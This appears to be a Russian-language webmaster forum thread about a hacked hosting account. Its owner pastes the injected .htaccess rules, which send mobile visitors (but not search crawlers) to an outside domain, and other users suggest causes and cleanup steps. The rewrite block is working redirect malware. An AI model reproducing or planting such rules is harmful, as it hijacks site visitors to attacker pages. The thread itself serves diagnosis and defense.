Посещаемость упала в 10 раз. Как узнать, работал ли сервер вчера?

[StrikeOFF]

Если доступ ко всем сайтам от имени того юзера что и на взломанном - то можно смело искать подарки и в других)

 

[danneo]

Если доступ ко всем сайтам от имени того юзера что и на взломанном - то можно смело искать подарки и в других)

Дак я и говорю, что взломаны все с одного аккау хостера. Но на всех сайтах разные пользователи (админы), FTP разные. Если только под общим зашли. Но где его взяли, не знаю. На других акках пока чисто... тфу-тфу-тфу
с другого ПК поменяю все пассы на других акках.
Логи буду смотреть взломанного акка, может чего там найдется. В панель не заходили никто левый, что странно.

Найдено:
В htaccess добавили строки:

RewriteEngine  on
RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
RewriteRule    (.*)    http://ru-updated.com/u/6400    [L,R=302]

На форумах такое многие обсуждают... по видимому не ломают, а крадут пароли...

Но почему-то, после бэкапа данная запись осталась на всех сайтах. Но при переходе с ПС уже не показывается заглушка. То ли отключил кто-то это, то ли чего-то не хватает. Ведь должно же редиректиться то?

 

[danneo]

В продолжении, может кому полезно будет потом
Сегодня та же ситуация...

 

[StrikeOFF]

Ты бы посмотрел все полностью и не ленился. Не факт что во время бэкапа не было редиректа. Уменьшение трафа - санкции от пс, например.
Если сам не уверен что найдешь все - используй Для просмотра ссылки Войди или Зарегистрируйся

У тебя стоит банальный редирект мобильного трафика в htaccess, но может быть и в шаблоне. Есть возможность удаленно менять часть контента на твоем сайте. Посмотри принцип действия софта CYCLIK от jacksoft. Вообщем если у тебя нету старых бэкапов - ищи внимательно. Дольше ищешь - меньше трафа.

 

[danneo]

Ты бы посмотрел все полностью и не ленился. Не факт что во время бэкапа не было редиректа. Уменьшение трафа - санкции от пс, например.
Если сам не уверен что найдешь все - используй Для просмотра ссылки Войди или Зарегистрируйся

У тебя стоит банальный редирект мобильного трафика в htaccess, но может быть и в шаблоне. Есть возможность удаленно менять часть контента на твоем сайте. Посмотри принцип действия софта CYCLIK от jacksoft. Вообщем если у тебя нету старых бэкапов - ищи внимательно. Дольше ищешь - меньше трафа.

да я и не ленюсь. Вчера часа 4 убил на это, и сегодня, думаю, будет еще больше. А идей все меньше и меньше о том, как это делают...

 

[grenadine]

Кейлоггер банальный может быть? В фтп клиенте пароли не сохраняются? От почты пароли не могли уйти? Дырка в cms (может быть, если версия старая)? Или в каком-то из плагинов.. Хреновая ситуация, сочувствую.

 

[bobkli]

Провер этим

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

 

[danneo]

Провер этим

он проверяет только браузер, а что на хосте делается, он не проверит

 

[danneo]

какой-то бред...
очистил все сайты. Сегодня опять та же фигня.
На всех сайтах прописана переадресация во всех файлах htaccess на всем сайте.
Проверял антивирусом, на 2-3 раз появились еще файлы:

./engine/editor/jscripts/tiny_mce/plugins/spellchecker/classes/utils/JSON.php
./engine/editor/jscripts/tiny_mce/plugins/xhtmlxtras/js/acronym.js
./templates/smartphone/userinfo.tpl

Восстанавливаю из бэкапа, а там все равно прописана переадресация.
Бывает так, что копию на сервер с ПК htaccess, а в него сразу помещается левый код.
Как такое возможно?

 

[StrikeOFF]

я бы проверил права на запись и посмотрел время изменения файлов в которые прописывается код. Если есть крон - там может быть запись которая этот код восстанавливает, но так-же может быть и в кроне хостера. Лучше к хостеру написать все-же, если самому трудно найти.